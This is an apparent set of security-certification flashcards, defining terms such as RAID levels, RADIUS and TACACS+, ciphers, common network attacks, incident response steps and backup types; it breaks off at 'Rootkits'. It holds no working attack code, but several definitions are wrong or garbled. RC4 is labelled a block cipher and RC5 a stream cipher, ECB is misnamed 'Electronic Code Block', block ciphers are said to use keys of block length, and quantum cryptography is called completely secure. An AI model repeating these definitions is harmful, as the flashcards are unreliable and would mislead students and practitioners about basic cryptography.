Parity computations are used in RAID drive arrays for fault tolerance by calculating the data in two drives and storing the results on a third. The parity is computed by XOR'ing a bit from drive 1 with a bit from drive 2 and storing the result on drive 3 (to learn about XOR, see OR). After a failed drive is replaced, the RAID controller rebuilds the lost data from the other two drives. RAID systems often have a "hot" spare drive ready and waiting to replace a drive that fails.
Grey Box Test
Partial Knowledge. Only Limited information is provided. An IP Address, a domain name, applications. Could also mean an internal test. From an insider's perspective.
Remote Access Security Protocols
Password Authentication Protocol (PAP), Challenge Handshake Authentication Protocol (CHAP), Microsoft CHAP (MS-CHAP), MS-CHAPv2, Remote Authentication Dial-In User Service (RADIUS), Diameter, and Terminal Access Controller Access-Control System Plus (TACACS +).
PAP
Password Authentication Protocol. An older authentication protocol where passwords are sent across the network in clear text. Rarely used today.
PBKDF2
Password-Based Key Derivation Function 2 is part of PKCS #5 v. 2.01. It applies some function (like a hash or HMAC) to the password or passphrase along with Salt to produce a derived key.
Patch management
Patch management procedures ensure that operating systems and applications are up to date with current patches. This protects systems against known vulnerabilities.
PCI
Payment Card Industry. PCI regulates financial transactions and provides security guidelines on how to protect PII, including credit card data. Requirement #11 says you must be scanned yearly and after big upgrades/modifications.
Containment (Incident Response Process)
Personnel attempt to contain or isolate the problem. This is often as simple as disconnecting a computer from a network.
electromagnetic pulse (EMP).
Systems can be protected from mild forms of EMP (a short burst of electromagnetic energy) such as electrostatic discharge and lightning.
PPTP
Point-to-Point Tunneling Protocol. A PPTP tunnel is instantiated by communication to the peer on TCP port 1723. This TCP connection is then used to initiate and manage a second GRE tunnel to the same peer. The PPTP GRE packet format is non-standard, including an additional acknowledgement field replacing the typical routing field in the GRE header. However, as in a normal GRE connection, those modified GRE packets are directly encapsulated into IP packets, and seen as IP protocol number 47.
PAT
Port Address Translation, is an extension to network address translation (NAT) that permits multiple devices on a local area network (LAN) to be mapped to a single public IP address. The goal of PAT is to conserve IP addresses.
Cloud Delivery Models
Private Cloud, Public, Community, Hybrid, and Cloud access security broker (CASB).
Data Classification Types
Public, Confidential, Proprietary, and Private
Public-Key Infrastructure X.509/Public-Key Cryptography Standards
Public-Key Infrastructure X.509 (PKIX) and Public-Key Cryptography Standards (PKCS)
Common methods used to destroy data and sanitize media are
Purging, File shredding, Wiping, and Burning
Quantum Cryptogrpahy
Quantum cryptography is a cryptosystem that is completely secure against being compromised without knowledge of the sender or the receiver of the messages.
RADIUS
RADIUS is a network protocol that is used to authenticate and authorize user access to a remote network. The term, RADIUS, is an acronym that stands for Remote Authentication Dial-In User Service. RADIUS is the market de facto standard. Uses UDP as a transport medium.
Remote Authentication Dial-In User Service (RADIUS)
RADIUS provides a centralized method of authentication for multiple remote access servers. RADIUS encrypts the password packets, but not the entire authentication process.
Ron's Cipher (RC)
RC4: Block cipher with 40 - 2,048 bit keys RC5: Stream cipher with 2,048 bit keys
RACE Integrity Primitives Evaluation Message Digest (RIPEMD)
RIPEMD: 160, 256, 320 bit hash lengths. If you can recognize the hashing algorithms such as MD5, SHA, and HMAC, it will help you answer many exam questions. For example, if a question asks what you would use to encrypt data and it lists hashing algorithms, you can quickly eliminate them because hashing algorithms don't encrypt data.
Securing Coding
Race condition, Error and exception handling, and Obfuscation.
Authorization (AAA)
Refers to access granted to resources. (Rights/Permissions)
Single Sign-On (SSO)
Refers to the ability of a user to log on or access multiple systems by providing credentials only once. Increases security because the user only needs to remember one set of credentials and is less likely to write them down. SSO does not provide authorization.
P12
Refers to the use of PKCS#12
RCP
Remote Copy Protocol command is meant to work like the CP (copy) command, except that it allows you to copy files and directories over the network to and from remote computers
RPC
Remote Procedure Call (RPC) is a programming interface that allows a remote computer to run programs on a local machine.
MDM Remote wipe
Remote wipe capabilities are useful if the phone is lost. It sends a remote signal to the device to wipe or erase all the data.
Pharming
Reroutes requests for legitimate websites to false websites. - Seeks to obtain personal or private (usually financial related) information through domain spoofing. Rather than being spammed with malicious and mischievous e-mail requests for you to visit spoof Web sites which appear legitimate, pharming 'poisons' a DNS server by infusing false information into the DNS server, resulting in a user's request being redirected elsewhere. Your browser, however will show you are at the correct Web site, which makes pharming a bit more serious and more difficult to detect. Phishing attempts to scam people one at a time with an e-mail while pharming allows the scammers to target large groups of people at one time through domain spoofing.
RC4
Rivest Cipher version 4 is the most widely used software stream cipher and is used in popular Internet protocols such as Secure Sockets Layer (SSL) and Transport Layer Security (TLS). WEP also uses RC4 but WEP is not secure.
Development Life-Cycle Models
SDLC (Software Development Lifecycle), Waterfall, Agile, and Secure DevOps
sftp pros/cons
SFTP (SSH File Transfer Protocol) is a network protocol that provides file transfer and manipulation functionality over any reliable data stream. It is typically used with the SSH-2 protocol (TCP port 22) to provide secure file transfer, but is intended to be usable with other protocols as well. Pros: Has a good standards background which strictly defines most (if not all) aspects of operations Has only one connection (no need for a DATA connection) The connection is always secured The directory listing is uniform and machine-readable The protocol includes operations for permission and attribute manipulation, file locking, and more functionality Cons: The communication is binary and can not be logged "as is" for human reading SSH keys are harder to manage and validate The standards define certain things as optional or recommended, which leads to certain compatibility problems between different software titles from different vendors. No server-to-server copy and recursive directory removal operations No built-in SSH/SFTP support in VCL and .NET frameworks
Personnel Security Controls
Security Guards, Video surveillance, Motion detection, Barricades, and Bollards. Fencing, lighting, and alarms all provide physical security. They are often used together to provided layered security.
SMB
Server Message Block, one version of which was also known as Common Internet File System (CIFS /sɪfs/),[1][2] is a network communication protocol[3] for providing shared access to files, printers, and serial ports between nodes on a network
Server and network rooms
Servers and network devices such as routers and switches are normally stored in areas where only the appropriate IT personnel can access them.
Shadow Copy
Shadow Copy (also known as Volume Snapshot Service,[1] Volume Shadow Copy Service[2] or VSS[2]) is a technology included in Microsoft Windows that can create backup copies or snapshots of computer files or volumes, even when they are in use
Risk Transference
Sharing some of the burden of the risk with someone else.
Two detection methods
Signature-based IDSs and Heuristic/ behavioral-based detection
FIN Flag
Signifies that the connection is finished
Why Social Engineer Works
Social engineers typically use one or more psychology-based principles to increase the effectiveness of their attacks. Social engineers typically use one or more psychology-based principles to increase the effectiveness of their attacks.
Cloud Models
Software as a Service SaaS, Platform as a Service PaaS, and Infrastructure as a Service IaaS.
Development (Secure Staging Environment)
Software developers use a development environment to create the application.
Disrupt the chain reaction
Some chemicals can disrupt the chain reaction of fires to stop them.
Secure work areas
Some companies restrict access to specific work areas when employees perform classified or restricted access tasks.
National versus international Frameworks
Some frameworks are used within a single country (and referred to as national frameworks), while others are used internationally.
Industry-specific Framework
Some frameworks only apply to certain industries. As an example, organizations that handle credit cards typically comply with the Payment Card Industry Data Security Standard (PCI DSS).
Impersonation
Some social engineers attempt to impersonate others to convince an authorized user to provide sensitive information, or help the attacker defeat a security control.
Protect system from malware
Spam filter on mail gateways. ▪ Anti-malware software on mail gateways. ▪ All systems. All workstations and servers have anti-malware software installed. ▪ Boundaries or firewalls. Many networks include detection tools that monitor network traffic through the firewall.
Terminal Access Controller Access-Control System Plus (TACACS +)
TACACS + is an alternative to RADIUS, but it is proprietary to Cisco systems. Additionally, TACACS + encrypts the entire authentication process, whereas RADIUS encrypts only the password.
Lightweight Directory Access Protocol (LDAP)
Specifies formats and methods to query directories. In this context, a directory is a database of objects that provides a central access point to manage users, computers, and other directory objects. LDAP provides a clear syntax for object identification and management. LDAP uses TCP port 389.
Common Attacks
Spoofing attacks (MAC Spoofing and IP Spoofing), Privilege escalation, Man-in-the-middle( MITM) (ARP Poisoning), DNS Attacks (DNS Poisoning), Amplification attacks (Smurf attack), and SYN Flood Attacks.
Code Testing
Static code analysis, Dynamic analysis, Fuzzing techniques, Stress testing, Sandboxing, and Model verification.
SEH
Structured Exception Handling is a Windows mechanism for handling both hardware and software exceptions consistently. Those with programming experience might be familiar with the exception handling construct which is often represented as a try/except or try/catch block of code.
Access Control Subjects
Subjects are typically users or groups that access an object.
SCADA
Supervisory Control and Data Acquisition, a computer system for gathering and analyzing real time data. SCADA systems are used to monitor and control a plant or equipment in industries such as telecommunications, water and waste control, energy, oil and gas refining and transportation.
SSH Port
TCP 22
TACACS versions
Terminal Access Controller Access-Control System (TACACS) is less secure than XTACACS, which is a proprietary extension of TACACS, and less secure than TACACS+, which replaced TACACS and XTACACS.
Test (Secure Staging Environment)
Testers put the application through its paces and attempt to discover any bugs or errors.
DHCP
The Dynamic Host Configuration Protocol (DHCP) is a standardized network protocol used on Internet Protocol (IP) networks for distributing IP addresses for interfaces and services. DHCP makes use of port 67 by the server and port 68 by the client.
RTO (Recovery Time Objective)
The Recovery Time Objective (RTO)[8][9] is the targeted duration of time and a service level within which a business process must be restored after a disaster (or disruption) in order to avoid unacceptable consequences associated with a break in business continuity.
SIP
The Session Initiation Protocol is a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications.
URG Flag
The URG flag is used to inform a receiving station that certain data within a segment is urgent and should be prioritized. If the URG flag is set, the receiving station evaluates the urgent pointer, a 16-bit field in the TCP header. This pointer indicates how much of the data in the segment, counting from the first byte, is urgent. - The URG flag is used to send data on a second channel of a TCP connection. It doesn't make sense to set it unless you're also sending data. The data will be kept in a separate buffer on the receiving end, the program is signaled that there's urgent data available, and it reads using a special flag to the "recv" system call.
Why is WEP a weak security solution?
The WEP key is stored with a very small pool of random numbers to make the cipher text. As the random numbers are often reused it becomes easy to derive the remaining WEP key. - WEP is based on RC4, but due to errors in design and implementation, WEP is weak in a number of areas, two of which are the use of a static common key and poor implementation of initiation vectors (IVs). When the WEP key is discovered, the attacker can join the network and then listen in on all other wireless client communications.
Fire Suppression
The different components of a fire are heat, oxygen, fuel, and a chain reaction creating the fire.
nslookup or dig
Two command-line tools used to test DNS. Microsoft systems include nslookup; Linux systems include dig.
Preparation (Incident Response Process)
The first step in the incident response process is preparation.
Spear Phishing
The fraudulent practice of sending emails ostensibly from a known or trusted sender in order to induce targeted individuals to reveal confidential information.
Directory Traversal
The goal of this attack is to use an affected application to gain unauthorized access to the file system. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code. An attack which allows attackers to access restricted directories and execute commands outside of the web server's root directory.
Differences Between Forward Proxy and Reverse Proxy
The main difference between the two is that forward proxy is used by the client such as a web browser whereas reverse proxy is used by the server such as a web server. Forward proxy can reside in the same internal network as the client, or it can be on the Internet.
Few to no collisions
Two different input should never produce the same output.
Basic Input/ Output System (BIOS)
The software built into the ROM chip that is the first code run by a computer when it is powered on. Its primary function is to identify and test the devices attached to the computer that are used to input and output information, such as the keyboard, monitor, hard drives, serial communications, and so on. Some newer computers, such as Apple Macintosh computers, use EFI instead of BIOS. includes software that provides a computer with basic instructions on how to boot. Both BIOS and UEFI can be upgraded using a process called flashing. Flashing overwrites the software within the chip with newer software.
Staging (Secure Staging Environment)
The staging environment simulates the production environment and is used for late stage testing.
WPA Cracking
There are three steps to penetrating a WPA-protected network. Sniffing, Parsing, and Attacking
P7b
These are Base64 encoded ASCII files.
Dynamic and private ports: 49,152- 65,535.
These ports are available for use by any application.
sftp vs ftps
They are two completely different protocols. FTPS is FTP with SSL for security. It uses a control channel and opens new connections for the data transfer. As it uses SSL, it requires a certificate. SFTP (SSH File Transfer Protocol/Secure File Transfer Protocol) was designed as an extension of SSH to provide file transfer capability, so it usually uses only the SSH port for both data and control. In most SSH server installations you will have SFTP support, but FTPS would need the additional configuration of a supported FTP server.
Require administrators to have two accounts
They use one account for regular day-to-day work. It has the same limited privileges as a regular end user.
CA Certificate
This is a certificate issued to a CA by another CA, this allows the CA that received the certificate to issue their own certificates.
End-Entity Certificate
This is a certificate issued to an end entity which uses certificate but doesn't issue them.
Diffie-Hellman
This is a system that provides key exchange in public networks.
CER
This is an alternate form of CRT used by Microsoft.
Lack of vendor support
This vulnerability is one of the biggest reasons why systems are compromised. When the vendor no longer creates fixes for a product vulnerabilities arise. When a vendor stops supporting a system, an operating system, or an application, it is time to start using something else.
SNMP Port
UDP 161/162
TFTP Port
UDP 69
Nontransparent proxy servers
Use URL filters to restrict access to certain sites. Both types can log user activity. This proxy is seen by the computer.
Spam filters
Use to remove spam from a users inbox on a mail server. ▪ The challenge with any spam filter is to only filter out spam, and never filter out actual email.
fat AP
Used at home. also known as a stand-alone, intelligent, or autonomous AP, includes everything needed to connect wireless clients to a wireless network. It typically includes features such as a routing component, NAT, DHCP, wireless security options, access control lists (ACLs), and more. A fat AP is also known as a stand-alone AP and is managed independently. A thin AP is also known as a controller-based AP and is managed by a wireless controller. The wireless controller configures the thin AP.
protocol analyzer
Used by administrators to capture, display, and analyze packets sent over a network. It is useful when troubleshooting communications problems between systems. ▪ It is also useful to detect attacks that manipulate or fragment packets. ▪ A capture shows information such as the type of traffic (protocol), flags, source and destination IP addresses, and source and destination MAC addresses. ▪ The NIC must be configured to use promiscuous mode to capture all traffic.
Internet Protocol security (IPsec)
Used to encrypt IP traffic. IPsec is used for a secure point-to-point connection traversing an insecure network such as the Internet. Authentication Header (AH) is a primary IPsec protocol that provides authentication of the sender's data.
Management frame protection
Used to protect against a disassociation attack
Block Cipher
Uses a fixed length block and computes it against a key of the same length.
Stream Cipher
Uses a pseudorandom keystream to compute a single bit
Electronic Code Block (ECB)
Uses an algorithm exactly as specified.
RSA
Uses large integers to encrypt data, provides key exchange, and digital signatures.
Sandboxing
Using a virtual machine to run a suspicious program to determine if it is malware. runs an application within an isolated environment to test it.
WPS Attack
Wi-Fi protected setup attacks use a brute force attack, but do not need to wait for an authorized client to connect.
Peripherals
Wireless keyboards and wireless mice, Displays, External storage devices, Digital cameras, and Printers and other multi-function devices (MFDs).
Wireless keyboards and wireless mice
Wireless transmissions can sometimes be intercepted.
Hot Aisle/Cold Aisle
With a hot aisle, hot air outlets are used to cool the equipment, whereas with cold aisles, cold air intake is used to cool the equipment. Combining the two, you have cold air intake from below the aisle and hot air outtake above it, providing constant circulation. This is a more effective way of controlling temperature to safeguard your equipment in a data center.
Paper shredding
You can physically shred papers by passing them through a shredder.
Black Box Test
Zero Knowledge. Also called Closed Test. Usually from an external location. From the outsider or hacker's perspective.
Tcpdump
a command-line packet analyzer (or protocol analyzer).
SYN flood attack
a common denial-of-service (DoS) attack. SYN flood attack, the attacker sends multiple SYN packets but never completes the third part of the TCP handshake with the last ACK packet.
Smurf Attack
a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address. Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim's computer will be flooded with traffic. This can slow down the victim's computer to the point where it becomes impossible to work on.
Agile
a flexible model that emphasizes interaction with all players in a project.
Vishing
a form of phishing that uses the phone system or VoIP. Some vishing attempts are fully automated. Others start automated but an attacker takes over at some point during the call.
Cyber Security Incident Response Team (CSIRT)
a group of experts that assesses, documents and responds to a cyber incident.
honeynet
a group of honeypots within a separate network or zone, but accessible from an organization's primary network. Security professionals often create honeynets using multiple virtual servers contained within a single physical server.
Trusted Platform Module (TPM)
a hardware chip included on many laptops and mobile devices. It provides full disk encryption and supports a secure boot process and remote attestation. A TPM includes a unique RSA asymmetric key burned into the chip that provides a hardware root of trust.
hoax
a message, often circulated through email, that tells of impending doom from a virus or other security threat that simply don't exist.
Internet Protocol security (IPsec)
a method for encrypting data-intransit. IPsec supports both Tunnel mode and Transport mode.
Cryptographic System
a method or process that is used to provide encryption and decryption.
Pretty Good Privacy (PGP)
a method used to secure email communication. It can encrypt, decrypt, and digitally sign email. PGP easier to use and setup than the corporate PKI model, but it is also less robust when it comes to issues like authentication and trust. However, the full benefits of public key cryptography are used. It is simple to incorporate into a small environment.
Nmap
a network port scanner
Vishing (voice phishing)
a phone scam that attempts to defraud people by asking them to call a bogus telephone number to confirm their account information. Asking login information over phone.
Airgap
a physical security control that ensures that a computer or network is physically isolated from another computer or network.
Contingency Plan
a plan designed to take a possible future event or circumstance into account.
chain of custody
a process that provides assurances that evidence has been controlled and handled properly after collection. ▪ Forensic experts establish a chain of custody when they first collect evidence.
hardware security module (HSM)
a removable or external device that can generate, store, and manage RSA keys used in asymmetric encryption. Many server-based applications use an HSM to protect keys. It provides a fast solution for the for large asymmetrical encryption calculations and is much faster than software-based cryptographic solutions.
Data execution prevention (DEP)
a security feature that prevents code from executing in memory regions marked as nonexecutable. It helps prevent an application or service from executing code from a nonexecutable memory region. ▪ The primary purpose of DEP is to protect a system from malware.
denial-of-service (DoS) attack
a service attack from a single source that attempts to disrupt the services provided by another system.
Cloud access security broker (CASB)
a software tool or service deployed between an organization's network and the cloud provider. It provides Security as a Service by monitoring traffic and enforcing security policies.
framework
a structure used to provide a foundation.
database
a structured set of data. It typically includes multiple tables and each table holds multiple columns and rows. Attackers use SQL injection attacks to pass queries to back-end databases through web servers. ▪ Input validation provides strong protection against SQL injection attacks.
Banner grabbing
a technique used to gain information about remote systems and many network scanners use it. ▪ It is often used to identify the operating system along with information about some applications.
Man-in-the-browser
a type of proxy Trojan horse that infects vulnerable web browsers. Successful man-in-the-browser attacks can capture browser session data.
Degausser
a very powerful electronic magnet. Passing a disk through a degaussing field renders the data on tape and magnetic disk drives unreadable.
virtual desktop infrastructure (VDI)
a virtual desktop and these can be created so that users can access them from a mobile device.
active scan (Wireless Scanner)
a wireless scanner acts like a scanner/ cracker and can gain more information about an AP by sending queries to it.
Educating users
about new viruses, phishing attacks, and zero-day exploits helps prevent incidents.
Security Guards
access to buildings and secure spaces.
security policies
administrative controls that identify a security plan. Personnel create plans and procedures to implement security controls and enforce the security policies. As an example, organizations often create standard operating procedures (SOPs) to support security policies. These typically include step-by-step instructions employees can use to perform common tasks or routine operations.
Mantraps
allow only a single person to pass at a time. Sophisticated mantraps can identify and authenticate individuals before allowing access. Prevents piggybacking.
Social media sites
allow people to share personal comments with a wide group of people. However, improper use of social networking sites can result in inadvertent information disclosure. Attackers can also use information available on these sites to launch attacks against users or in a cognitive password attack to change a user's password. Training helps users understand the risks.
STARTTLS
allows an encrypted version of POP or IMAP over their standard ports as the unencrypted versions.
Lessons Learned (Incident Response Process)
allows personnel to analyze the incident and the response with a goal of preventing a future occurrence.
Wi-Fi Protected Setup (WPS)
allows users to configure wireless devices without typing in the passphrase. WPS is susceptible to brute force attacks. A WPS attack keeps trying different PINs until it succeeds.
Compensating Controls
alternative controls used instead of primary controls. e.g. Employee monitoring.
penetration test
an active test that can assess deployed security controls and determine the impact of a threat. It starts with a vulnerability scan and then tries to exploit vulnerabilities by actually attacking or simulating an attack. Penetration tests include both passive and active reconnaissance. After exploiting a system, penetration testers use privilege escalation techniques to gain more access to target systems.
Pulping
an additional step taken after shredding paper. It reduces the shredded paper to mash or puree by soaking it in liquid.
security incident
an adverse event or series of events that can negatively affect the confidentiality, integrity, or availability of data or systems within the organization, or that has the potential to do so.
Secure DevOps
an agile-aligned methodology that stresses security throughout the lifetime of the project.
SLA
an agreement between a company and a vendor. It stipulates performance expectations, such as minimum uptime and maximum downtime levels for a service. If the parties will be handling sensitive data, they should include an ISA to ensure strict guidelines are in place to protect the data while in transit. An MOU/ MOA often support an ISA.
false positive
an alert or alarm on an event that is nonthreatening, benign, or harmless. A false positive incorrectly indicates an attack is occurring when an attack is not active. A high incidence of false positives increases the administrator's workload.
Recovery Site
an alternate processing site that an organization can use after a disaster. Types include: hot site, cold site, warm site, and Mobile sites.
Domain hijacking attack
an attacker changes the registration of a domain name without permission from the owner.
NFC attack
an attacker uses an NFC reader to capture data from another NFC device. One method is an eavesdropping attack. The NFC reader uses an antenna to boost its range, and intercepts the data transfer between two other devices.
script kiddie
an attacker who uses existing computer scripts or code to launch attacks. Script kiddies typically have very little expertise, sophistication, and funding.
Data privacy officer
an executive responsible for ensuring the organization complies with relevant laws.
RAID 6
an extension of RAID 5, and it includes an additional parity block. A fault tolerant solution that uses dual parity and striping. A minimum of four disks are required for RAID-6. Dual parity allows RAID-6 to recover from the simultaneous failure of up to two disks. Critical data should be stored on a RAID-6 system.
RAID
an inexpensive method used to add fault tolerance and increase availability.
PSH (PUSH Flag)
an option provided by TCP that allows the sending application to start sending the data even when the buffer is not full (contains data less than MTU). The application needs to set the PSH flag to true for the socket and with that TCP starts pushing the data immediately
Dynamic analysis
analysis that takes into account the passage of time. checks the code while it is running.
Operating system (OS) detection techniques
analyze packets from an IP address to identify the OS. Network scanner
single point of failure
any component whose failure results in the failure of an entire system. Elements such as RAID, failover clustering, UPSs, and generators remove many single points of failure.
embedded system
any device that has a dedicated function and uses a computer system to perform that function. It includes any devices in the Internet of things (IoT) category, such as wearable technology and home automation systems. Some embedded systems use a system on a chip System on a Chip(SoC).
Key Exchange
any method in cryptography by which cryptographic keys are exchanged between two parties to allow use of a cryptographic algorithm.
Manmade threat
any potential dangers from people and can be either malicious or accidental.
insider
anyone who has legitimate access to an organization's internal resources, such as an employee of a company.
XaaS
anything as a service - a cloud computing model that can work with a combination of other models: SaaS, IaaS, PaaS
Trojan
appears to be something useful but includes a malicious component, such as installing a backdoor on a user's system. Many Trojans are delivered via drive-by downloads. They can also infect systems from fake antivirus software, pirated software, games, or infected USB drives.
Unified Threat Management (UTM)
appliance combines multiple security controls into a single appliance. They can inspect data streams and often include URL filtering, malware inspection, and contention inspection components. Many UTMs include a DDoS mitigator to block DDoS attacks.
Failover clusters
are a group of servers that work together to maintain high availability.
Rainbow table attacks
are a type of attack that attempts to discover the password from the hash. A rainbow table is a huge database of precomputed hashes. Password Attack
Proximity cards
are credit card-sized access cards. Users pass the card near a proximity card reader and the card reader then reads data on the card. ▪ Some access control points use proximity cards with PINs for authentication.
Tabletop exercises
are discussion-based sessions where team members meet in an informal setting to discuss their roles during an emergency and their responses to a particular emergency situation.
Bollards
are effective barricades that can block vehicles.
Cable locks
are effective threat deterrents for small equipment such as laptops and some workstations. ▪ When used properly, they prevent losses due to theft of small equipment. ▪ Locking cabinets in server rooms provide an added physical security measure.
Network-based firewalls
are often dedicated servers or appliances and provide protection for the network.
Advanced persistent threats (APTs)
are sponsored by governments and they launch sophisticated, targeted attacks.
Test restores
are the best way to test the integrity of a company's backup data.
Zero-day exploits
are undocumented and unknown to the public. The vendor might know about it, but has not yet released a patch to address it.
Man-in-the-middle( MITM)
attack is a form of active interception or active eavesdropping. ▪ ARP poisoning attacks attempt to mislead systems about the actual MAC address of a system. ▪ ARP poisoning is sometimes used in man-in-the-middle attacks.
Cross-site scripting (XSS)
attacks allow attackers to capture user information such as cookies. ▪ Technique where attackers embed malicious HTML or JavaScript code into a web site's code. The code executes when the user visits the site. ▪ Input validation techniques at the server help prevent XSS attacks.
Brute force attacks
attempt to guess passwords. ▪ Online attacks guess the password of an online system. ▪ Offline attacks guess the password stored within a file, such as a database. Password Attack
Fire suppression methods
attempt to remove or disrupt one of these elements to extinguish a fire... Remove the heat, Remove the oxygen, Remove the fuel, and Disrupt the chain reaction
keylogger
attempts to capture a user's keystrokes. The keystrokes are stored in a file, and are either sent to an attacker automatically, or the attacker may manually retrieve the file.
password cracker
attempts to discover a password.
offline password cracker
attempts to discover passwords by analyzing a database or file containing passwords.
online password cracker
attempts to discover passwords by guessing them in a brute force attack.
watering hole attack
attempts to discover which web sites a group of people are likely to visit and then infects those web sites with malware that can infect the visitors.
Pass the hash attack
attempts to intercepted user's password hash to access an the user's account. ▪ Salting adds random text to passwords before hashing them and thwarts many password attacks, including rainbow table attacks. Password Attack
Obfuscation
attempts to make something unclear or difficult to understand. ▪ Code obfuscation (or code camouflage) attempts to make the code unreadable.
MAC flood attack
attempts to overload a switch with different MAC addresses associated with each physical port.
Attribute-based access control (ABAC) evaluates
attributes and grants access based on the value of these attributes. Attributes can be almost any characteristic of a user, the environment, or the resource. The ABAC model uses attributes defined in policies to grant access to resources. It's commonly used in software defined networks (SDNs).
Incremental Backup
backs up only the changed data since the last backup -- be it a full or incremental backup. Number of backups increment until the next full.
Differential Backup
backs up only the files that changed since the last full backup. There will be two backups at any given point. Example; You preform a full backup on Sunday. On Monday you back up only the files that changed since Sunday, on Tuesday you back up only the files that changed since Sunday, until the next full backup.
Regulatory framework
based on relevant laws and regulations.
Antispoofing methods
block traffic using ACL rules.
stateful firewall
blocks traffic based on the state of the packet within a session.
stateless firewall
blocks traffic using an ACL.
Quantitative risk assessment
comes into play when we have the ability to map a dollar amount to a specific risk. 1. Asset Value (AV) 2. Exposure Factor (EF) 3. Single Loss Expectancy (SLE) 4. Annual Rate of Occurrence (ARO) 5. Annual Loss Expectancy (ALE)
Exit interview
conducted with departing employees just before they leave an organization. ▪ User accounts are often disabled or deleted during the exit interview and everything issued to the employee is collected.
limit the range of an AP to a room or building
by reducing the AP's power level. This prevents people from connecting because they will be out of the AP's range.
Passphrase
can also contain symbols, and does not have to be a proper sentence or grammatically correct. The main difference of the two is that passwords do not have spaces while passphrases have spaces and are longer than any random string of letters.
Competitors
can also engage in attacks. Their motivation is typically to gain proprietary information about another company.
Biometrics locks
can also identify and authenticate users.
Local Registration Authority (LRA)
can be used to identify or establish the identity of an individual for certificate issuance.
External threat
can come from any source outside the organization.
Registration Authority (RA)
can distribute keys, accept registrations for the CA, and validate identities.
cloud- based DLP
can enforce security policies for data stored in the cloud, such as ensuring that Personally Identifiable Information (PII) is encrypted.
vulnerability scanner
can identify vulnerabilities, misconfigured systems, and the lack of security controls such as up-to-date patches. Vulnerability scans are passive and have little impact on a system during a test.
Switch
can learn which computers are attached to each of its physical ports. If an attacker installed a protocol analyzer on a computer attached to a switch port the protocol analyzer would not capture traffic that is not intended for that port.
Wireless scanners
can typically use both passive and active scans.
Replay attacks
capture data in a session with the intent of later impersonating one of the parties in the session. ▪ Timestamps and sequence numbers are effective counter measures against replay attacks. Password Attack
background check
checks into a potential employee's history with the intention of discovering anything about the person that might make him a less-than- ideal fit for a job. ▪ They may include criminal checks, credit checks, and an individual's online activity.
Runtime code
code that is evaluated, interpreted, and executed when the code is run. As an example, HTML is the standard used to create web pages.
botnet
combines the words robot and network. It includes multiple computers that act as software robots (bots) and function together in a network (such as the Internet), often for malicious purposes. The bots in a botnet are often called zombies and they will do the bidding of whoever controls the botnet. Botnets are used to launch DDOS attacks.
transitive trust
creates an indirect trust relationship. e.g. if subject A trusts subject B and subject B trusts subject C, then A would trust C if the trust between A and B was transitive.
Confidential Data
data information is kept secret among a certain group of people.
Public Data
data is available to anyone.
Proprietary Data
data related to ownership, such as patents or trade secrets.
Account expiration
dates automatically disable accounts on the expiration date. This is useful for temporary accounts such as temporary contractors.
incident response policy
defines a security incident and incident response procedures.
Acceptable use policy (AUP)
defines proper system usage or the rules of behavior for employees when using information technology (IT) systems.
Memorandum of Understanding (MOU) or Memorandum of Agreement (MOA)
defines responsibilities of each party, but it is not as strict as a Service Level Agreement (SLA) or Interconnection Security Agreement (ISA).
Real-time Transport Protocol (RTP)
delivers audio and video over IP networks. Typoically uses unprivileged UDP ports (1024 to 65535)
Recovery Point Objective (RPO)
describes the interval of time that might pass during a disruption before the quantity of data lost during that period exceeds the BCP's maximum allowable threshold or "tolerance." - Defines the point at which the system needs to be restored. This could be where the system was two days before it crashed (whip out the old backup tapes) or five minutes before it crashed (requiring complete redundancy). This is an essential business goal insofar as system restoration and acceptable data loss is concerned.
Antivirus and Anti-Malware Software
detects and removes malware, such as viruses, Trojans, and worms. Some antivirus scanners use file integrity checkers to detect modified system files.
Heuristic-based software
detects previously unknown malware based on behavior.
Signs
deter many people from entering a restricted area.
Corporate-owned, personally enabled (COPE)
devices are owned by the organization, but employees can use them for personal reasons.
Network mapping
discovers devices on the network and how they are connected with each other.
RAID 1
disk mirroring/duplexing: Allows one disk in a pair to fail. RAID-1 can be used where fault tolerance is required over performance, such as on an authentication server.
RAID 5
disk striping with parity: Allows one disk to fail in a set of at least three disk with one disk's worth of space being used for parity information. However, the parity information is distributed across all the disks. RAID-5 can recover from a sing disk failure.
RAID 0
disk striping: Provides no fault tolerance. It is not a fault tolerant solution but does improve disk performance for read/write operations. Striping requires a minimum of two disks and does not use parity. RAID-0 can be used where performance is required over fault tolerance, such as a media streaming server.
ipconfig /displaydns
displays all cached dns entries in a windows system
Mobile sites
do not have dedicated locations, but can provide temporary support during a disaster.
Data classifications
ensure that users understand the value of data, and the classifications help protect sensitive data. Classifications can apply to hard data (printouts) and soft data (files). Data classifications and data labeling help ensure personnel apply the proper security controls to protect information.
Access Control Models
ensures that only authenticated and authorized entities can access resources. Role-based access control (Role-BAC) ▪ Rule-based access control (Rule-BAC) ▪ Discretionary access control (DAC) ▪ Mandatory access control (MAC) ▪ Attribute-based access control (ABAC)
Role-based training
ensures that personnel receive the training they need. For example, executives need training on whaling attacks. Common roles that require role-based training are data owners, system administrators, system owners, end users, privileged users, and executive users.
supply chain assessment
evaluates everything needed to produce and sell a product. ▪ It includes all the raw materials and processes required to create and distribute a finished product.
Discretionary access control (DAC) model
every object (such as files and folders) has an owner, and the owner establishes access for the objects. Many operating systems, such as Windows and most Unix-based systems, use the DAC model. The DAC model specifies that every object has an owner, and the owner has full, explicit control of the object. Microsoft's NTFS filesystem uses the DAC model.
In-Band key
exchange is when the same channel that requires encryption is also used to exchange keys.
Out-of-Band key
exchange uses any other means than the channel that requires encryption is used to exchange keys.
firewall
filters incoming and outgoing traffic for a single host or between networks. Firewalls use a deny any any, deny any, or a drop all statement at the end of the ACL to enforce an implicit deny strategy. ▪ The statement forces the firewall to block any traffic that wasn't previously allowed in the ACL. The implicit deny strategy provides a secure starting point for a firewall.
Netcat
for remotely accessing Linux systems.
proxy server
forwards requests for services from a client. It provides caching to improve performance and reduce Internet bandwidth usage.
Data steward or custodian
handles routine tasks to protect data.
Compiled code
has been optimized by an application (called a compiler) and converted into an executable file. The compiler checks the program for errors and provides a report of items developers might like to check.
Data owner
has overall responsibility for the protection of the data.
Rootkits
